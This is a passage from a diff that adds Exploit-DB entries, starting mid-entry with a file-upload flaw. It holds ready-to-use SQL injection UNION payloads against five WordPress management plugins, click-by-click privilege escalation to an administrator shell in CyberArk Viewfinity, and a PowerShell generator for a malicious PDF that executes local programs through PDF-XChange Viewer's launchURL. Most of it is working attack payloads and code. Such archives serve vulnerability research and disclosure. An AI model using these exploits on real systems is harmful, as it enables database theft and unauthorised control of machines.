 #                     move_uploaded_file($_FILES['image']['tmp_name'],$this->user_image.$_FILES['image']['name']);
 #                     $this->store_image=$_FILES['image']['name'];
 #                 }else{
 #                     $this->store_image=$this->request->data('old_image');
 #                 }
 # 	
 # Proof of Concept: 
 # 
 # http://localhost/[PATH]/account/profilesetting/[ID]
 # http://localhost/[PATH]/img/user/[FILE]
 # 
 # Etc..
 # # # # #
--- a/platforms/php/webapps/42800.txt
+++ b/platforms/php/webapps/42800.txt
@ -0,0 +1,27 @@
 # # # # # 
 # Exploit Title: WPCHURCH - Church Management System for Wordpress - SQL Injection
 # Dork: N/A
 # Date: 26.09.2017
 # Vendor Homepage: http://mojoomla.com/
 # Software Link: https://codecanyon.net/item/wpchurch-church-management-system-for-wordpress/14292251
 # Demo: http://mobilewebs.net/mojoomla/extend/wordpress/church/
 # Version: N/A
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # # # # #
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Social: @ihsansencan
 # # # # #
 # Description:
 # The vulnerability allows an student members to inject sql commands....
 # 
 # Proof of Concept: 
 # 
 # http://localhost/[PATH]/?church-dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]
 # 
 # -50++UNION(SELECT(1),(2),(3),(4),(5),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(7),(8))--+-
 # 
 # Etc..
 # # # # #
--- a/platforms/php/webapps/42801.txt
+++ b/platforms/php/webapps/42801.txt
@ -0,0 +1,27 @@
 # # # # # 
 # Exploit Title: WPGYM - Wordpress Gym Management System  - SQL Injection
 # Dork: N/A
 # Date: 26.09.2017
 # Vendor Homepage: http://mojoomla.com/
 # Software Link: https://codecanyon.net/item/-wpgym-wordpress-gym-management-system/13352964
 # Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/gym/
 # Version: N/A
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # # # # #
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Social: @ihsansencan
 # # # # #
 # Description:
 # The vulnerability allows an student members to inject sql commands....
 # 
 # Proof of Concept: 
 # 
 # http://localhost/[PATH]/?dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]
 # 
 # -50++UNION(SELECT(1),(2),(3),(4),(5),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(7),(8))--+-
 # 
 # Etc..
 # # # # #
--- a/platforms/php/webapps/42802.txt
+++ b/platforms/php/webapps/42802.txt
@ -0,0 +1,27 @@
 # # # # # 
 # Exploit Title: Hospital Management System for Wordpress - SQL Injection
 # Dork: N/A
 # Date: 26.09.2017
 # Vendor Homepage: http://mojoomla.com/
 # Software Link: https://codecanyon.net/item/hospital-management-system-for-wordpress/12094634
 # Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/hospital/
 # Version: N/A
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # # # # #
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Social: @ihsansencan
 # # # # #
 # Description:
 # The vulnerability allows an student members to inject sql commands....
 # 
 # Proof of Concept: 
 # 
 # http://localhost/[PATH]/?dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]
 # 
 # -50++UNION(SELECT(1),(2),(3),(4),(5),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(7),(8))--+-
 # 
 # Etc..
 # # # # #
--- a/platforms/php/webapps/42804.txt
+++ b/platforms/php/webapps/42804.txt
@ -0,0 +1,27 @@
 # # # # # 
 # Exploit Title: School Management System for Wordpress  - SQL Injection
 # Dork: N/A
 # Date: 26.09.2017
 # Vendor Homepage: http://mojoomla.com/
 # Software Link: https://codecanyon.net/item/school-management-system-for-wordpress/11470032
 # Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/school/
 # Version: N/A
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # # # # #
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Social: @ihsansencan
 # # # # #
 # Description:
 # The vulnerability allows an student members to inject sql commands....
 # 
 # Proof of Concept: 
 # 
 # http://localhost/[PATH]/?dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]
 # 
 # -50++UNION(SELECT(1),(2),(3),(4),(5),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(7),(8))--+-
 # 
 # Etc..
 # # # # #
--- a/platforms/php/webapps/42805.txt
+++ b/platforms/php/webapps/42805.txt
@ -0,0 +1,27 @@
 # # # # # 
 # Exploit Title: WPAMS - Apartment Management System for wordpress  - SQL Injection
 # Dork: N/A
 # Date: 26.09.2017
 # Vendor Homepage: http://mojoomla.com/
 # Software Link: https://codecanyon.net/item/wpams-apartment-management-system-for-wordpress/15946837
 # Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/apartment/
 # Version: N/A
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 # # # # #
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Social: @ihsansencan
 # # # # #
 # Description:
 # The vulnerability allows an student members to inject sql commands....
 # 
 # Proof of Concept: 
 # 
 # http://localhost/[PATH]/?apartment-dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]
 # 
 # -50++UNION(SELECT(1),(2),(3),(4),(5),(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),(7),(8))--+-
 # 
 # Etc..
 # # # # #
--- a/platforms/windows/local/42319.txt
+++ b/platforms/windows/local/42319.txt
@ -0,0 +1,33 @@
 # Exploit Title: Privilege Escalation via CyberArk Viewfinity <= 5.5 (5.5.10.95)
 # Date: Found June 2017
 # Vendor Homepage: https://www.cyberark.com/ 
 # Version: Viewfinity version 5.5 (5.5.10.95)
 # Exploit Author: Eric Guillen aka geoda
 # Contact: https://twitter.com/ericsguillen
 # Website: https://geodasecurity.blogspot.com/
 # Tested on: Windows 7 and Windows 10
 # CVE: CVE-2017-11197
 # Category: Privilege Escalation
 1. Description
 Viewfinity allows the business to "effectively minimize local administrator privileges and control applications on endpoints and servers"
 This vulnerability allows a low privilege user to escalate to an administrative user via a bug within the Viewfinity "add printer" option.
 2. Proof of Concept
 First, verify you are a low privilege user by running the command "net session" in a CMD prompt. Net session displays information about all sessions with the local computer. The user will get Access is denied if they do not have Administrative privileges. 
 1. On the system tray, right click on Viewfinity and "Open Viewfinity Control Panel..."
 2. Click "Add Printer"
 3. Click "Add a network, wireless or Bluetooth printer"
 4. Click "The printer that I want isn't listed"
 5. Click "Select a shared printer by name"
 6. Click the "Browse..." icon
 7. Directly in the browser window, search for "C:\windows\system32\cmd.exe" and press <Enter>
 8. This will spawn a new CMD prompt. Verify you are now Administrator by typing in "net session"
 3. Solution
 Vendor has been notified of this vulnerability and has been addressed in the agent v6.1.1.220. Although untested, this vulnerability could be present prior to v6.1.1.220
--- a/platforms/windows/local/42537.txt
+++ b/platforms/windows/local/42537.txt
@ -0,0 +1,81 @@
 # Exploit Title: PDF-XChange Viewer 2.5 (Build 314.0) Javascript API Remote Code Execution Exploit (Powershell PDF Exploit Creation)
 # Date: 21-08-2017
 # Software Link 32bit: http://pdf-xchange-viewer.it.uptodown.com/windows
 # Exploit Author: Daniele Votta
 # Contact: vottadaniele@gmail.com
 # Website: https://www.linkedin.com/in/vottadaniele/
 # CVE: 2017-13056
 # Category: PDF Reader RCE
 1. Description
 This module exploits an unsafe Javascript API implemented in PDF-XChange Viewer.
 The launchURL() function allows an attacker to execute local files on the file
 system and bypass the security dialog.
 2. Proof of Concept (Generate evil PDF that start calc.exe) 
 Step 1: Customize New-PDFjs.ps1 (custom params + PdfSharp-WPF.dll path)
 Step 2: Execute Windows PowerShell: PS C:\Users\User> New-PDFJS
 Step 3: Open the generated PDF with Nitro Pro PDF Reader
 3. PDF Generation:
 function New-PDFJS {
    # Use the desidered params
     [CmdletBinding()]
    Param (
    	[string]$js ="app.launchURL('C:\\Windows\\System32\\calc.exe')",
 	[string]$msg = "Hello PDF",
        [string]$filename = "C:\Users\User\Desktop\calc.pdf"
    )
    # Use the PDFSharp-WPF.dll library path
    Add-Type -Path C:\Users\Daniele\Desktop\PdfSharp-WPF.dll
    $doc = New-Object PdfSharp.Pdf.PdfDocument
    $doc.Info.Title = $msg
    $doc.info.Creator = "AnonymousUser"
    $page = $doc.AddPage()
    $graphic = [PdfSharp.Drawing.XGraphics]::FromPdfPage($page)
    $font = New-Object PdfSharp.Drawing.XFont("Courier New", 20, [PdfSharp.Drawing.XFontStyle]::Bold)
    $box  = New-Object PdfSharp.Drawing.XRect(0,0,$page.Width, 100)
    $graphic.DrawString($msg, $font, [PdfSharp.Drawing.XBrushes]::Black, $box, [PdfSharp.Drawing.XStringFormats]::Center)
    $dictjs = New-Object PdfSharp.Pdf.PdfDictionary
    $dictjs.Elements["/S"]  = New-Object PdfSharp.Pdf.PdfName ("/JavaScript")
    $dictjs.Elements["/JS"] = New-Object PdfSharp.Pdf.PdfStringObject($doc, $js);
    $doc.Internals.AddObject($dictjs)
    $dict = New-Object PdfSharp.Pdf.PdfDictionary
    $pdfarray = New-Object PdfSharp.Pdf.PdfArray
    $embeddedstring = New-Object PdfSharp.Pdf.PdfString("EmbeddedJS")
    $dict.Elements["/Names"] = $pdfarray
    $pdfarray.Elements.Add($embeddedstring)
    $pdfarray.Elements.Add($dictjs.Reference)
    $doc.Internals.AddObject($dict)
    $dictgroup = New-Object PdfSharp.Pdf.PdfDictionary
    $dictgroup.Elements["/JavaScript"] = $dict.Reference
    $doc.Internals.Catalog.Elements["/Names"] = $dictgroup
    $doc.Save($filename)
 }
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42537.zip